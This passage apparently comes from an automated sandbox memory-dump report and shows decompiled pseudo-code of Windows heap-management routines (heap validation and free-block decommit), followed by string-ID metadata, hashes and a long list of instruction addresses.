                                      								E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      							}
                                      							_push(_t328);
                                      							_push(_v24);
                                      							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
                                      							goto L58;
                                      						} else {
                                      							goto L50;
                                      						}
                                      						while(1) {
                                      							L50:
                                      							_t92 = _t327 - 0x10; // -24
                                      							_t282 = _t331;
                                      							_t230 = E01A34AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
                                      							__eflags = _t230;
                                      							if(_t230 == 0) {
                                      								goto L59;
                                      							}
                                      							_t327 =  *_t327;
                                      							__eflags = _t327 - _t261;
                                      							if(_t327 != _t261) {
                                      								continue;
                                      							}
                                      							_t184 = _v24;
                                      							_t282 = _v36;
                                      							goto L53;
                                      						}
                                      						goto L59;
                                      					} else {
                                      						while(1) {
                                      							_t39 = _t326 + 0x18; // 0x10
                                      							_t264 = _t39;
                                      							if(_t331[0x13] != 0) {
                                      								_t319 = _t331[0x14] ^  *_t264;
                                      								 *_t264 = _t319;
                                      								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
                                      								_t348 = _t319 >> 0x18 - _t303;
                                      								if(_t319 >> 0x18 != _t303) {
                                      									_push(_t303);
                                      									E01A2FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
                                      								}
                                      								_t281 = 0x81;
                                      							}
                                      							_t317 = _v20;
                                      							if(_t317 != 0) {
                                      								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
                                      								_t350 = _t241;
                                      								if(_t350 != 0) {
                                      									if(_t350 >= 0) {
                                      										__eflags = _t241 & 0x00000800;
                                      										if(__eflags == 0) {
                                      											__eflags = _t241 - _t331[0x21];
                                      											if(__eflags < 0) {
                                      												_t298 = _t241;
                                      												_t65 = _t317 + _t298 * 4;
                                      												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
                                      												__eflags =  *_t65;
                                      											}
                                      										}
                                      									} else {
                                      										_t244 = _t241 & 0x00007fff;
                                      										if(_t244 < _t281) {
                                      											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
                                      										}
                                      									}
                                      								}
                                      							}
                                      							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E01A223E3(_t331, _t264) == 0) {
                                      								break;
                                      							}
                                      							if(_t331[0x13] != 0) {
                                      								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
                                      								 *_t264 =  *_t264 ^ _t331[0x14];
                                      							}
                                      							_t326 =  *_t326;
                                      							if( &(_t331[0x27]) == _t326) {
                                      								goto L49;
                                      							} else {
                                      								_t281 = 0x81;
                                      								continue;
                                      							}
                                      						}
                                      						__eflags = _t331[0x13];
                                      						if(_t331[0x13] != 0) {
                                      							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
                                      							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
                                      						}
                                      						goto L65;
                                      					}
                                      				} else {
                                      					L83:
                                      					return _t267;
                                      				}
                                      			}

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                      • API String ID: 0-1357697941
                                      • Opcode ID: 981a2d2a4921d098ee6880250e2a4211555eb85ad816bb1cdad827780b40f9ec
                                      • Instruction ID: b4943f98fd0c04651f7db231ba6f74fefe73743759c81ea4da42ee5beeeae64d
                                      • Opcode Fuzzy Hash: 981a2d2a4921d098ee6880250e2a4211555eb85ad816bb1cdad827780b40f9ec
                                      • Instruction Fuzzy Hash: 68F12235A00646DFDB26CF69C484BAAFBF5FFC9304F08806AF54A97641D734A985CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 72%
                                      			E0199A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
                                      				char _v8;
                                      				signed short _v12;
                                      				signed short _v16;
                                      				signed int _v20;
                                      				signed int _v24;
                                      				signed short _v28;
                                      				signed int _v32;
                                      				signed int _v36;
                                      				signed int _v40;
                                      				signed int _v44;
                                      				signed int _v48;
                                      				unsigned int _v52;
                                      				signed int _v56;
                                      				void* _v60;
                                      				intOrPtr _v64;
                                      				void* _v72;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __ebp;
                                      				unsigned int _t246;
                                      				signed char _t247;
                                      				signed short _t249;
                                      				unsigned int _t256;
                                      				signed int _t262;
                                      				signed int _t265;
                                      				signed int _t266;
                                      				signed int _t267;
                                      				intOrPtr _t270;
                                      				signed int _t280;
                                      				signed int _t286;
                                      				signed int _t289;
                                      				intOrPtr _t290;
                                      				signed int _t291;
                                      				signed int _t317;
                                      				signed short _t320;
                                      				intOrPtr _t327;
                                      				signed int _t339;
                                      				signed int _t344;
                                      				signed int _t347;
                                      				intOrPtr _t348;
                                      				signed int _t350;
                                      				signed int _t352;
                                      				signed int _t353;
                                      				signed int _t356;
                                      				intOrPtr _t357;
                                      				intOrPtr _t366;
                                      				signed int _t367;
                                      				signed int _t370;
                                      				intOrPtr _t371;
                                      				signed int _t372;
                                      				signed int _t394;
                                      				signed short _t402;
                                      				intOrPtr _t404;
                                      				intOrPtr _t415;
                                      				signed int _t430;
                                      				signed int _t433;
                                      				signed int _t437;
                                      				signed int _t445;
                                      				signed short _t446;
                                      				signed short _t449;
                                      				signed short _t452;
                                      				signed int _t455;
                                      				signed int _t460;
                                      				signed short* _t468;
                                      				signed int _t480;
                                      				signed int _t481;
                                      				signed int _t483;
                                      				intOrPtr _t484;
                                      				signed int _t491;
                                      				unsigned int _t506;
                                      				unsigned int _t508;
                                      				signed int _t513;
                                      				signed int _t514;
                                      				signed int _t521;
                                      				signed short* _t533;
                                      				signed int _t541;
                                      				signed int _t543;
                                      				signed int _t546;
                                      				unsigned int _t551;
                                      				signed int _t553;
                                      
                                      				_t450 = __ecx;
                                      				_t553 = __ecx;
                                      				_t539 = __edx;
                                      				_v28 = 0;
                                      				_v40 = 0;
                                      				if(( *(__ecx + 0xcc) ^  *0x1a68a68) != 0) {
                                      					_push(_a4);
                                      					_t513 = __edx;
                                      					L11:
                                      					_t246 = E0199A830(_t450, _t513);
                                      					L7:
                                      					return _t246;
                                      				}
                                      				if(_a8 != 0) {
                                      					__eflags =  *(__edx + 2) & 0x00000008;
                                      					if(( *(__edx + 2) & 0x00000008) != 0) {
                                      						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
                                      						_t430 = E0199DF24(__edx,  &_v12,  &_v16);
                                      						__eflags = _t430;
                                      						if(_t430 != 0) {
                                      							_t157 = _t553 + 0x234;
                                      							 *_t157 =  *(_t553 + 0x234) - _v16;
                                      							__eflags =  *_t157;
                                      						}
                                      					}
                                      					_t445 = _a4;
                                      					_t514 = _t539;
                                      					_v48 = _t539;
                                      					L14:
                                      					_t247 =  *((intOrPtr*)(_t539 + 6));
                                      					__eflags = _t247;
                                      					if(_t247 == 0) {
                                      						_t541 = _t553;
                                      					} else {
                                      						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
                                      						__eflags = _t541;
                                      					}
                                      					_t249 = 7 + _t445 * 8 + _t514;
                                      					_v12 = _t249;
                                      					__eflags =  *_t249 - 3;
                                      					if( *_t249 == 3) {
                                      						_v16 = _t514 + _t445 * 8 + 8;
                                      						E01979373(_t553, _t514 + _t445 * 8 + 8);
                                      						_t452 = _v16;
                                      						_v28 =  *(_t452 + 0x10);
                                      						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
                                      						_v36 =  *(_t452 + 0x14);
                                      						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
                                      						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
                                      						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
                                      						_t256 =  *(_t452 + 0x14);
                                      						__eflags = _t256 - 0x7f000;
                                      						if(_t256 >= 0x7f000) {
                                      							_t142 = _t553 + 0x1ec;
                                      							 *_t142 =  *(_t553 + 0x1ec) - _t256;
                                      							__eflags =  *_t142;
                                      							_t256 =  *(_t452 + 0x14);
                                      						}
                                      						_t513 = _v48;
                                      						_t445 = _t445 + (_t256 >> 3) + 0x20;
                                      						_a4 = _t445;
                                      						_v40 = 1;
                                      					} else {
                                      						_t27 =  &_v36;
                                      						 *_t27 = _v36 & 0x00000000;
                                      						__eflags =  *_t27;
                                      					}
                                      					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
                                      					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
                                      						_v44 = _t513;
                                      						_t262 = E0197A9EF(_t541, _t513);
                                      						__eflags = _a8;
                                      						_v32 = _t262;
                                      						if(_a8 != 0) {
                                      							__eflags = _t262;
                                      							if(_t262 == 0) {
                                      								goto L19;
                                      							}
                                      						}
                                      						__eflags =  *0x1a68748 - 1;
                                      						if( *0x1a68748 >= 1) {
                                      							__eflags = _t262;
                                      							if(_t262 == 0) {
                                      								_t415 =  *[fs:0x30];
                                      								__eflags =  *(_t415 + 0xc);
                                      								if( *(_t415 + 0xc) == 0) {
                                      									_push("HEAP: ");
                                      									E0197B150();
                                      								} else {
                                      									E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      								}
                                      								_push("(UCRBlock != NULL)");
                                      								E0197B150();
                                      								__eflags =  *0x1a67bc8;
                                      								if( *0x1a67bc8 == 0) {
                                      									__eflags = 1;
                                      									E01A32073(_t445, 1, _t541, 1);
                                      								}
                                      								_t513 = _v48;
                                      								_t445 = _a4;
                                      							}
                                      						}
                                      						_t350 = _v40;
                                      						_t480 = _t445 << 3;
                                      						_v20 = _t480;
                                      						_t481 = _t480 + _t513;
                                      						_v24 = _t481;
                                      						__eflags = _t350;
                                      						if(_t350 == 0) {
                                      							_t481 = _t481 + 0xfffffff0;
                                      							__eflags = _t481;
                                      						}
                                      						_t483 = (_t481 & 0xfffff000) - _v44;
                                      						__eflags = _t483;
                                      						_v52 = _t483;
                                      						if(_t483 == 0) {
                                      							__eflags =  *0x1a68748 - 1;
                                      							if( *0x1a68748 < 1) {
                                      								goto L9;
                                      							}
                                      							__eflags = _t350;
                                      							goto L146;
                                      						} else {
                                      							_t352 = E019A174B( &_v44,  &_v52, 0x4000);
                                      							__eflags = _t352;
                                      							if(_t352 < 0) {
                                      								goto L94;
                                      							}
                                      							_t353 = E01997D50();
                                      							_t447 = 0x7ffe0380;
                                      							__eflags = _t353;
                                      							if(_t353 != 0) {
                                      								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                      							} else {
                                      								_t356 = 0x7ffe0380;
                                      							}
                                      							__eflags =  *_t356;
                                      							if( *_t356 != 0) {
                                      								_t357 =  *[fs:0x30];
                                      								__eflags =  *(_t357 + 0x240) & 0x00000001;
                                      								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
                                      									E01A314FB(_t447, _t553, _v44, _v52, 5);
                                      								}
                                      							}
                                      							_t358 = _v32;
                                      							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                      							_t484 =  *((intOrPtr*)(_v32 + 0x14));
                                      							__eflags = _t484 - 0x7f000;
                                      							if(_t484 >= 0x7f000) {
                                      								_t90 = _t553 + 0x1ec;
                                      								 *_t90 =  *(_t553 + 0x1ec) - _t484;
                                      								__eflags =  *_t90;
                                      							}
                                      							E01979373(_t553, _t358);
                                      							_t486 = _v32;
                                      							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
                                      							E01979819(_t486);
                                      							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
                                      							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
                                      							_t366 =  *((intOrPtr*)(_v32 + 0x14));
                                      							__eflags = _t366 - 0x7f000;
                                      							if(_t366 >= 0x7f000) {
                                      								_t104 = _t553 + 0x1ec;
                                      								 *_t104 =  *(_t553 + 0x1ec) + _t366;
                                      								__eflags =  *_t104;
                                      							}
                                      							__eflags = _v40;
                                      							if(_v40 == 0) {
                                      								_t533 = _v52 + _v44;
                                      								_v32 = _t533;
                                      								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
                                      								__eflags = _v24 - _v52 + _v44;
                                      								if(_v24 == _v52 + _v44) {
                                      									__eflags =  *(_t553 + 0x4c);
                                      									if( *(_t553 + 0x4c) != 0) {
                                      										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
                                      										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
                                      									}
                                      								} else {
                                      									_t449 = 0;
                                      									_t533[3] = 0;
                                      									_t533[1] = 0;
                                      									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
                                      									_t491 = _t394;
                                      									 *_t533 = _t394;
                                      									__eflags =  *0x1a68748 - 1; // 0x0
                                      									if(__eflags >= 0) {
                                      										__eflags = _t491 - 1;
                                      										if(_t491 <= 1) {
                                      											_t404 =  *[fs:0x30];
                                      											__eflags =  *(_t404 + 0xc);
                                      											if( *(_t404 + 0xc) == 0) {
                                      												_push("HEAP: ");
                                      												E0197B150();
                                      											} else {
                                      												E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      											}
                                      											_push("((LONG)FreeEntry->Size > 1)");
                                      											E0197B150();
                                      											_pop(_t491);
                                      											__eflags =  *0x1a67bc8 - _t449; // 0x0
                                      											if(__eflags == 0) {
                                      												__eflags = 0;
                                      												_t491 = 1;
                                      												E01A32073(_t449, 1, _t541, 0);
                                      											}
                                      											_t533 = _v32;
                                      										}
                                      									}
                                      									_t533[1] = _t449;
                                      									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                      									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
                                      										_t402 = (_t533 - _t541 >> 0x10) + 1;
                                      										_v16 = _t402;
                                      										__eflags = _t402 - 0xfe;
                                      										if(_t402 >= 0xfe) {
                                      											_push(_t491);
                                      											_push(_t449);
                                      											E01A3A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
                                      											_t533 = _v48;
                                      											_t402 = _v32;
                                      										}
                                      										_t449 = _t402;
                                      									}
                                      									_t533[3] = _t449;
                                      									E0199A830(_t553, _t533,  *_t533 & 0x0000ffff);
                                      									_t447 = 0x7ffe0380;
                                      								}
                                      							}
                                      							_t367 = E01997D50();
                                      							__eflags = _t367;
                                      							if(_t367 != 0) {
                                      								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                      							} else {
                                      								_t370 = _t447;
                                      							}
                                      							__eflags =  *_t370;
                                      							if( *_t370 != 0) {
                                      								_t371 =  *[fs:0x30];
                                      								__eflags =  *(_t371 + 0x240) & 1;
                                      								if(( *(_t371 + 0x240) & 1) != 0) {
                                      									__eflags = E01997D50();
                                      									if(__eflags != 0) {
                                      										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                      										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                      									}
                                      									E01A31411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
                                      								}
                                      							}
                                      							_t372 = E01997D50();
                                      							_t546 = 0x7ffe038a;
                                      							_t446 = 0x230;
                                      							__eflags = _t372;
                                      							if(_t372 != 0) {
                                      								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                      							} else {
                                      								_t246 = 0x7ffe038a;
                                      							}
                                      							__eflags =  *_t246;
                                      							if( *_t246 == 0) {
                                      								goto L7;
                                      							} else {
                                      								__eflags = E01997D50();
                                      								if(__eflags != 0) {
                                      									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
                                      									__eflags = _t546;
                                      								}
                                      								_push( *_t546 & 0x000000ff);
                                      								_push(_v36);
                                      								_push(_v40);
                                      								goto L120;
                                      							}
                                      						}
                                      					} else {
                                      						L19:
                                      						_t31 = _t513 + 0x101f; // 0x101f
                                      						_t455 = _t31 & 0xfffff000;
                                      						_t32 = _t513 + 0x28; // 0x28
                                      						_v44 = _t455;
                                      						__eflags = _t455 - _t32;
                                      						if(_t455 == _t32) {
                                      							_t455 = _t455 + 0x1000;
                                      							_v44 = _t455;
                                      						}
                                      						_t265 = _t445 << 3;
                                      						_v24 = _t265;
                                      						_t266 = _t265 + _t513;
                                      						__eflags = _v40;
                                      						_v20 = _t266;
                                      						if(_v40 == 0) {
                                      							_t266 = _t266 + 0xfffffff0;
                                      							__eflags = _t266;
                                      						}
                                      						_t267 = _t266 & 0xfffff000;
                                      						_v52 = _t267;
                                      						__eflags = _t267 - _t455;
                                      						if(_t267 < _t455) {
                                      							__eflags =  *0x1a68748 - 1; // 0x0
                                      							if(__eflags < 0) {
                                      								L9:
                                      								_t450 = _t553;
                                      								L10:
                                      								_push(_t445);
                                      								goto L11;
                                      							}
                                      							__eflags = _v40;
                                      							L146:
                                      							if(__eflags == 0) {
                                      								goto L9;
                                      							}
                                      							_t270 =  *[fs:0x30];
                                      							__eflags =  *(_t270 + 0xc);
                                      							if( *(_t270 + 0xc) == 0) {
                                      								_push("HEAP: ");
                                      								E0197B150();
                                      							} else {
                                      								E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      							}
                                      							_push("(!TrailingUCR)");
                                      							E0197B150();
                                      							__eflags =  *0x1a67bc8;
                                      							if( *0x1a67bc8 == 0) {
                                      								__eflags = 0;
                                      								E01A32073(_t445, 1, _t541, 0);
                                      							}
                                      							L152:
                                      							_t445 = _a4;
                                      							L153:
                                      							_t513 = _v48;
                                      							goto L9;
                                      						}
                                      						_v32 = _t267;
                                      						_t280 = _t267 - _t455;
                                      						_v32 = _v32 - _t455;
                                      						__eflags = _a8;
                                      						_t460 = _v32;
                                      						_v52 = _t460;
                                      						if(_a8 != 0) {
                                      							L27:
                                      							__eflags = _t280;
                                      							if(_t280 == 0) {
                                      								L33:
                                      								_t446 = 0;
                                      								__eflags = _v40;
                                      								if(_v40 == 0) {
                                      									_t468 = _v44 + _v52;
                                      									_v36 = _t468;
                                      									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
                                      									__eflags = _v20 - _v52 + _v44;
                                      									if(_v20 == _v52 + _v44) {
                                      										__eflags =  *(_t553 + 0x4c);
                                      										if( *(_t553 + 0x4c) != 0) {
                                      											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
                                      											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
                                      										}
                                      									} else {
                                      										_t468[3] = 0;
                                      										_t468[1] = 0;
                                      										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
                                      										_t521 = _t317;
                                      										 *_t468 = _t317;
                                      										__eflags =  *0x1a68748 - 1; // 0x0
                                      										if(__eflags >= 0) {
                                      											__eflags = _t521 - 1;
                                      											if(_t521 <= 1) {
                                      												_t327 =  *[fs:0x30];
                                      												__eflags =  *(_t327 + 0xc);
                                      												if( *(_t327 + 0xc) == 0) {
                                      													_push("HEAP: ");
                                      													E0197B150();
                                      												} else {
                                      													E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      												}
                                      												_push("(LONG)FreeEntry->Size > 1");
                                      												E0197B150();
                                      												__eflags =  *0x1a67bc8 - _t446; // 0x0
                                      												if(__eflags == 0) {
                                      													__eflags = 1;
                                      													E01A32073(_t446, 1, _t541, 1);
                                      												}
                                      												_t468 = _v36;
                                      											}
                                      										}
                                      										_t468[1] = _t446;
                                      										_t522 =  *((intOrPtr*)(_t541 + 0x18));
                                      										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                      										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
                                      											_t320 = _t446;
                                      										} else {
                                      											_t320 = (_t468 - _t541 >> 0x10) + 1;
                                      											_v12 = _t320;
                                      											__eflags = _t320 - 0xfe;
                                      											if(_t320 >= 0xfe) {
                                      												_push(_t468);
                                      												_push(_t446);
                                      												E01A3A80D(_t522, 3, _t468, _t541);
                                      												_t468 = _v52;
                                      												_t320 = _v28;
                                      											}
                                      										}
                                      										_t468[3] = _t320;
                                      										E0199A830(_t553, _t468,  *_t468 & 0x0000ffff);
                                      									}
                                      								}
                                      								E0199B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
                                      								E0199A830(_t553, _v64, _v24);
                                      								_t286 = E01997D50();
                                      								_t542 = 0x7ffe0380;
                                      								__eflags = _t286;
                                      								if(_t286 != 0) {
                                      									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                      								} else {
                                      									_t289 = 0x7ffe0380;
                                      								}
                                      								__eflags =  *_t289;
                                      								if( *_t289 != 0) {
                                      									_t290 =  *[fs:0x30];
                                      									__eflags =  *(_t290 + 0x240) & 1;
                                      									if(( *(_t290 + 0x240) & 1) != 0) {
                                      										__eflags = E01997D50();
                                      										if(__eflags != 0) {
                                      											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                      											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                      										}
                                      										E01A31411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
                                      									}
                                      								}
                                      								_t291 = E01997D50();
                                      								_t543 = 0x7ffe038a;
                                      								__eflags = _t291;
                                      								if(_t291 != 0) {
                                      									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                      								} else {
                                      									_t246 = 0x7ffe038a;
                                      								}
                                      								__eflags =  *_t246;
                                      								if( *_t246 != 0) {
                                      									__eflags = E01997D50();
                                      									if(__eflags != 0) {
                                      										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                      										__eflags = _t543;
                                      									}
                                      									_push( *_t543 & 0x000000ff);
                                      									_push(_t446);
                                      									_push(_t446);
                                      									L120:
                                      									_push( *(_t553 + 0x74) << 3);
                                      									_push(_v52);
                                      									_t246 = E01A31411(_t446, _t553, _v44, __eflags);
                                      								}
                                      								goto L7;
                                      							}
                                      							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                      							_t339 = E019A174B( &_v44,  &_v52, 0x4000);
                                      							__eflags = _t339;
                                      							if(_t339 < 0) {
                                      								L94:
                                      								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
                                      								__eflags = _v40;
                                      								if(_v40 == 0) {
                                      									goto L153;
                                      								}
                                      								E0199B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
                                      								goto L152;
                                      							}
                                      							_t344 = E01997D50();
                                      							__eflags = _t344;
                                      							if(_t344 != 0) {
                                      								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                      							} else {
                                      								_t347 = 0x7ffe0380;
                                      							}
                                      							__eflags =  *_t347;
                                      							if( *_t347 != 0) {
                                      								_t348 =  *[fs:0x30];
                                      								__eflags =  *(_t348 + 0x240) & 1;
                                      								if(( *(_t348 + 0x240) & 1) != 0) {
                                      									E01A314FB(_t445, _t553, _v44, _v52, 6);
                                      								}
                                      							}
                                      							_t513 = _v48;
                                      							goto L33;
                                      						}
                                      						__eflags =  *_v12 - 3;
                                      						_t513 = _v48;
                                      						if( *_v12 == 3) {
                                      							goto L27;
                                      						}
                                      						__eflags = _t460;
                                      						if(_t460 == 0) {
                                      							goto L9;
                                      						}
                                      						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
                                      						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
                                      							goto L9;
                                      						}
                                      						goto L27;
                                      					}
                                      				}
                                      				_t445 = _a4;
                                      				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
                                      					_t513 = __edx;
                                      					goto L10;
                                      				}
                                      				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
                                      				_v20 = _t433;
                                      				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
                                      					_t513 = _t539;
                                      					goto L9;
                                      				} else {
                                      					_t437 = E019999BF(__ecx, __edx,  &_a4, 0);
                                      					_t445 = _a4;
                                      					_t514 = _t437;
                                      					_v56 = _t514;
                                      					if(_t445 - 0x201 > 0xfbff) {
                                      						goto L14;
                                      					} else {
                                      						E0199A830(__ecx, _t514, _t445);
                                      						_t506 =  *(_t553 + 0x238);
                                      						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
                                      						_t246 = _t506 >> 4;
                                      						if(_t551 < _t506 - _t246) {
                                      							_t508 =  *(_t553 + 0x23c);
                                      							_t246 = _t508 >> 2;
                                      							__eflags = _t551 - _t508 - _t246;
                                      							if(_t551 > _t508 - _t246) {
                                      								_t246 = E019AABD8(_t553);
                                      								 *(_t553 + 0x23c) = _t551;
                                      								 *(_t553 + 0x238) = _t551;
                                      							}
                                      						}
                                      						goto L7;
                                      					}
                                      				}
                                      			}
                                      0x0199a70e
                                      0x0199a71a
                                      0x0199a71e
                                      0x019e1fcb
                                      0x019e1fcf
                                      0x019e1fdd
                                      0x019e1fe3
                                      0x019e1fe3
                                      0x0199a724
                                      0x0199a728
                                      0x0199a72a
                                      0x0199a72d
                                      0x0199a737
                                      0x0199a73a
                                      0x0199a73c
                                      0x0199a742
                                      0x0199a748
                                      0x019e1f4d
                                      0x019e1f50
                                      0x019e1f56
                                      0x019e1f5c
                                      0x019e1f5f
                                      0x019e1f7e
                                      0x019e1f83
                                      0x019e1f61
                                      0x019e1f76
                                      0x019e1f7b
                                      0x019e1f89
                                      0x019e1f8e
                                      0x019e1f93
                                      0x019e1f94
                                      0x019e1f9a
                                      0x019e1f9c
                                      0x019e1f9e
                                      0x019e1fa1
                                      0x019e1fa1
                                      0x019e1fa6
                                      0x019e1fa6
                                      0x019e1f50
                                      0x0199a74e
                                      0x0199a751
                                      0x0199a754
                                      0x0199a75d
                                      0x0199a75e
                                      0x0199a762
                                      0x0199a767
                                      0x019e1faf
                                      0x019e1fb0
                                      0x019e1fb9
                                      0x019e1fbe
                                      0x019e1fc2
                                      0x019e1fc2
                                      0x0199a76d
                                      0x0199a76d
                                      0x0199a775
                                      0x0199a778
                                      0x0199a77d
                                      0x0199a77d
                                      0x0199a71e
                                      0x0199a782
                                      0x0199a787
                                      0x0199a789
                                      0x019e1ff3
                                      0x0199a78f
                                      0x0199a78f
                                      0x0199a78f
                                      0x0199a791
                                      0x0199a794
                                      0x019e1ffd
                                      0x019e2006
                                      0x019e200c
                                      0x019e2017
                                      0x019e2019
                                      0x019e2024
                                      0x019e2024
                                      0x019e2024
                                      0x019e2047
                                      0x019e2047
                                      0x019e200c
                                      0x0199a79a
                                      0x0199a79f
                                      0x0199a7a4
                                      0x0199a7a9
                                      0x0199a7ab
                                      0x019e205a
                                      0x0199a7b1
                                      0x0199a7b1
                                      0x0199a7b1
                                      0x0199a7b3
                                      0x0199a7b6
                                      0x00000000
                                      0x0199a7bc
                                      0x019e2066
                                      0x019e2068
                                      0x019e2073
                                      0x019e2073
                                      0x019e2073
                                      0x019e2078
                                      0x019e2079
                                      0x019e207d
                                      0x00000000
                                      0x019e207d
                                      0x0199a7b6
                                      0x0199a440
                                      0x0199a440
                                      0x0199a440
                                      0x0199a446
                                      0x0199a44c
                                      0x0199a44f
                                      0x0199a453
                                      0x0199a455
                                      0x019e20b3
                                      0x019e20b9
                                      0x019e20b9
                                      0x0199a45d
                                      0x0199a460
                                      0x0199a464
                                      0x0199a466
                                      0x0199a46b
                                      0x0199a46f
                                      0x0199a471
                                      0x0199a471
                                      0x0199a471
                                      0x0199a474
                                      0x0199a479
                                      0x0199a47d
                                      0x0199a47f
                                      0x019e2229
                                      0x019e222f
                                      0x0199a3c8
                                      0x0199a3c8
                                      0x0199a3ca
                                      0x0199a3ca
                                      0x00000000
                                      0x0199a3ca
                                      0x019e2235
                                      0x019e223a
                                      0x019e223a
                                      0x00000000
                                      0x00000000
                                      0x019e2240
                                      0x019e2246
                                      0x019e224a
                                      0x019e2269
